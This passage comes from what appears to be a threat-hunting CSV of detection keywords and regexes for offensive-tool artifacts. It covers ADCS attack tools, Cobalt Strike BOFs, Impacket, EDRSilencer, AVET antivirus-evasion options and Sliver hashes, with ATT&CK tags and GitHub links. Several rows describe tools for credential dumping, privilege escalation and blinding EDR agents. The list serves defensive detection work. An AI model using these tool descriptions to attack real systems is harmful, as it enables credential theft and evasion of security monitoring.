TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","567","85","2024-01-30T14:31:55Z","2019-04-09T07:41:42Z" "*ADCS Server location identified on IP *",".{0,1000}ADCS\sServer\slocation\sidentified\son\sIP\s.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is 
vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","0","N/A","7","1","76","7","2023-12-15T10:49:39Z","2023-12-14T14:31:05Z" "*adcs_enum.*",".{0,1000}adcs_enum\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*adcs_enum_com.*",".{0,1000}adcs_enum_com\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*adcs_enum_com2.*",".{0,1000}adcs_enum_com2\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*ADCS_Maybe_ESC8_HTTPS_Vulnerable.txt*",".{0,1000}ADCS_Maybe_ESC8_HTTPS_Vulnerable\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*adcsattack.py*",".{0,1000}adcsattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ADCSCoercePotato.cpp*",".{0,1000}ADCSCoercePotato\.cpp.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*ADCSCoercePotato.exe*",".{0,1000}ADCSCoercePotato\.exe.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential 
Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*ADCSCoercePotato.sln*",".{0,1000}ADCSCoercePotato\.sln.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*ADCSCoercePotato.vcxproj*",".{0,1000}ADCSCoercePotato\.vcxproj.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*ADCSCoercePotato\n- @decoder_it 2024\*",".{0,1000}ADCSCoercePotato\\n\-\s\@decoder_it\s2024\\.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*adcshunter.py*",".{0,1000}adcshunter\.py.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","1","N/A","7","1","76","7","2023-12-15T10:49:39Z","2023-12-14T14:31:05Z" "*adcskiller.py*",".{0,1000}adcskiller\.py.{0,1000}","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. 
It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","7","680","69","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" "*ADCSPwn.csproj*",".{0,1000}ADCSPwn\.csproj.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","796","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*ADCSPwn.exe*",".{0,1000}ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","796","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*ADCSPwn.exe*",".{0,1000}ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ADCSPwn.sln*",".{0,1000}ADCSPwn\.sln.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","796","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*ADCSPwn-master*",".{0,1000}ADCSPwn\-master.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","796","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*adcsync.py -*",".{0,1000}adcsync\.py\s\-.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","9","2","185","21","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z" "*Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific 
process*",".{0,1000}Add\sWFP\sfilters\sto\sblock\sthe\sIPv4\sand\sIPv6\soutbound\straffic\sof\sa\sspecific\sprocess.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "*Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes*",".{0,1000}Add\sWFP\sfilters\sto\sblock\sthe\sIPv4\sand\sIPv6\soutbound\straffic\sof\sall\sdetected\sEDR\sprocesses.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "*add_evasion check_fast_forwarding*",".{0,1000}add_evasion\scheck_fast_forwarding.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion computation_fibonacci *",".{0,1000}add_evasion\scomputation_fibonacci\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. 
as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion computation_timed_fibonacci*",".{0,1000}add_evasion\scomputation_timed_fibonacci.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion evasion_by_sleep *",".{0,1000}add_evasion\sevasion_by_sleep\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion fopen_sandbox_evasion*",".{0,1000}add_evasion\sfopen_sandbox_evasion.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. 
For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion get_bios_info*",".{0,1000}add_evasion\sget_bios_info.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion get_computer_domain *",".{0,1000}add_evasion\sget_computer_domain\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion get_cpu_cores *",".{0,1000}add_evasion\sget_cpu_cores\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion get_install_date *",".{0,1000}add_evasion\sget_install_date\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion get_num_processes*",".{0,1000}add_evasion\sget_num_processes.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion get_standard_browser *",".{0,1000}add_evasion\sget_standard_browser\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion get_tickcount*",".{0,1000}add_evasion\sget_tickcount.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion gethostbyname_sandbox_evasion*",".{0,1000}add_evasion\sgethostbyname_sandbox_evasion.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_background_wp*",".{0,1000}add_evasion\shas_background_wp.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_folder *",".{0,1000}add_evasion\shas_folder\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_network_drive*",".{0,1000}add_evasion\shas_network_drive.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_public_desktop*",".{0,1000}add_evasion\shas_public_desktop.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_recent_files*",".{0,1000}add_evasion\shas_recent_files.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_recycle_bin*",".{0,1000}add_evasion\shas_recycle_bin.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_username *",".{0,1000}add_evasion\shas_username\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_vm_mac*",".{0,1000}add_evasion\shas_vm_mac.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_vm_regkey*",".{0,1000}add_evasion\shas_vm_regkey.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion hide_console*",".{0,1000}add_evasion\shide_console.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion interaction_getchar*",".{0,1000}add_evasion\sinteraction_getchar.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion interaction_system_pause*",".{0,1000}add_evasion\sinteraction_system_pause.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion is_debugger_present*",".{0,1000}add_evasion\sis_debugger_present.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion sleep_by_ping *",".{0,1000}add_evasion\ssleep_by_ping\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*Add_Privilege /Process:* /Privilege:*",".{0,1000}Add_Privilege\s\/Process\:.{0,1000}\s\/Privilege\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*add_random_newlines(obfuscated_code*",".{0,1000}add_random_newlines\(obfuscated_code.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*add0626b999fe41981a9f6fbf0e5ee1bc51e4677397e8b8c69cc7a2d36571a4c*",".{0,1000}add0626b999fe41981a9f6fbf0e5ee1bc51e4677397e8b8c69cc7a2d36571a4c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - 
T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*adda6c0cbcc22357d88157922fafad38cc732fd71fa1389181dc1b31c7f6428e*",".{0,1000}adda6c0cbcc22357d88157922fafad38cc732fd71fa1389181dc1b31c7f6428e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation 